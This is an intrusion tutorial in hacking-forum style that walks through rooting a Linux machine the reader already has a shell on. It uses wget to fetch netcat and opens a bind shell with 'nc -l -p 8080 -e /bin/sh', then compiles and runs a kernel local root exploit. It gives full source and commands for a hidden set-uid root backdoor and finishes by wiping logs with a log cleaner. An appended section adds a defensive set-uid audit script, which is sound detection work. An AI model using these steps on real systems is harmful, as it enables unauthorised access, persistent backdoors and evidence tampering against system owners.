**Please note: you must already have shell access to a Linux box before using this tutorial (this covers rooting ONLY, not getting the initial shell).**
First: Download / Obtain Access to the Following:
Required for this Tutorial:
Shell Access - To a Linux Box
Local Root Exploit - Depending on Linux OS and Kernel Version of Box
mig-log cleaner - [link requires forum login]; learn how to compile it
Netcat - [link requires forum login]; Netcat (Unix) - [link requires forum login]; learn how to compile it
Patience - Work at it until you get the job done.
Now that you have all that in order, let's begin.
Step 1: Reconnaissance
Log in to the shell -> Find out the Linux distribution and kernel version of the box (for example with uname -a; ie: Linux 2.6.8) -> Locate a "Local Root Exploit" for that exact kernel version (Google and security vulnerability websites; an exploit for a different version will at best fail and at worst crash the box) -> Go into a writable folder in the shell (one where you can also execute files)
Step 2: Netcat
Find the "Command Execution" area in the shell -> Enter the following: wget [link requires forum login] (the unshortened link, so wget gets the binary and not a redirect page) -> Type chmod +x nc -> Back in the "Command Execution" area, enter the following: ./nc -l -p 8080 -e /bin/sh (the -e option hands the connecting client a shell; it exists in netcat-traditional builds only, and on a Linux box the shell is /bin/sh, not cmd.exe) -> Install Netcat on your PC -> Enter the following: nc VictimIP Port (in our case 8080), eg: nc 123.123.123.123 8080
This should give you an interactive shell. If it didn't, verify that port 8080 is reachable from your PC (a firewall on the box or in front of it will block it) and that the listener is still running; note that this listener serves one client and exits when you disconnect, so you must start it again for each connection. If you DO have an interactive shell, this box is ready for rooting.
Step 3: Exploiting
Find the Local Root Exploit for this box -> In the newly spawned shell, type wget [link requires forum login] -> If the exploit is not compiled, compile it by typing the following: gcc xpl.c -o xpl (the binary gcc writes is already executable, so the extra chmod +x xpl is harmless but not needed; if there is no gcc on the box you must compile it elsewhere against the same libc and architecture) ->
**Note: Exploits vary in their usage (some need arguments, some need a specific target offset), so make sure you understand the root exploit you are using before you run it.**
You can run your xpl file by entering in: ./xpl
Wait until your exploit is finished running. Once it is done, enter:
whoami
The whoami command tells you who you are. If it prints root, then your xpl has done
its job and you now have root privileges on the box. Or you can type:
id
which will give you something like:
uid=0(root) gid=0(root) groups=500(apache) or something similar (uid=0 is what matters; the group list may still show the web server's groups)
And now you can do your happy dance.
Now that we have rooted the box and finished humiliating ourselves by dancing around, we want to make
sure that we can come and go as we please without the hassle of rooting the box over and over. So
we will want to create some kind of backdoor.
We can make this happen with a few lines of code (a set-uid root binary that spawns a shell):
/* Backdoor: when this binary is owned by root with the set-uid bit,
   any user who runs it gets a shell with uid 0. */
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
int main( void )
{
/* The process starts with effective uid 0 thanks to the set-uid bit.
   setuid( 0 ) makes the real and saved uids 0 as well, so the shell
   started below does not drop privileges. The gid is left unchanged. */
setuid( 0 );
system( "/bin/bash" );
return 0;
}
Compile it, set the owner and then the set-id bits (in that order: on Linux, chown clears the set-uid and set-gid bits, so chmod +s must come after chown):
root@foobar /root# gcc -o .bkdr main.c
root@foobar /root# chown root:root .bkdr
root@foobar /root# chmod +s .bkdr
Now, all you have to do is put .bkdr somewhere on the system where you can execute it (preferably
in the $PATH, and on a filesystem that is not mounted nosuid, since /tmp and /home often are and the set-uid bit is ignored there), and if you execute it as another user:
raif@foobar /home/raif$ /usr/local/bin/.bkdr
root@foobar /home/raif# whoami
root
Now you have your access back.
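The backdoor above is exactly the kind of file a set-uid audit turns up, so here is the check from the other side. This is an added example, not code from the original tutorial: a POSIX sh function that lists every set-uid or set-gid file under a directory and marks as SUSPECT anything that is not in a known-good baseline or that has a hidden name like ".bkdr". The baseline list and the OK/SUSPECT report format are this example's own assumptions.

```shell
#!/bin/sh
# Added example (not from the tutorial): audit set-uid/set-gid files.
# BASELINE is an assumed known-good list; build yours from a clean
# install of the same distribution with the same find command.
BASELINE="/usr/bin/sudo /usr/bin/passwd /usr/bin/su /usr/bin/mount /usr/bin/umount"

# audit_suid DIR: print "<status> <path>" for each set-uid/set-gid
# regular file under DIR, where status is OK (in BASELINE) or SUSPECT.
audit_suid() {
    dir=$1
    find "$dir" -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null |
    while IFS= read -r path; do
        base=$(basename "$path")
        status=OK
        case " $BASELINE " in
            *" $path "*) ;;          # exact match against a baseline entry
            *) status=SUSPECT ;;      # a set-id file we did not expect
        esac
        case $base in
            .*) status=SUSPECT ;;     # hidden filename, as with ".bkdr"
        esac
        printf '%s %s\n' "$status" "$path"
    done
}

# count_suspects DIR: how many SUSPECT lines audit_suid reports.
count_suspects() {
    audit_suid "$1" | grep -c '^SUSPECT ' || true
}

# Usage: audit_suid /usr/local/bin   (or audit_suid / for the whole box)
```

Run it as root over / on a machine you are responsible for and diff the output against a clean install; a set-uid root file with a dot-prefixed name in /usr/local/bin is precisely the artifact this tutorial leaves behind.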
Alright, we have almost completed our mission. We have successfully rooted the victim's box and created our backdoor; now all we need to do is wipe the tracks we left in the logs and be on our way. This can be done with a log cleaner of some kind. For this tutorial we used mig-log cleaner, which you
can get here: [link requires forum login]
Once again we can use our wget command to download the log cleaner onto the rooted box. Then just run the log cleaner:
./miglc
The mig-log cleaner has a wide variety of functions, which are displayed when you run it,
so you may choose exactly how you want to clean the logs with the commands it gives you. I hope you
enjoyed my tutorial and learned something from it as well. Good luck to you all.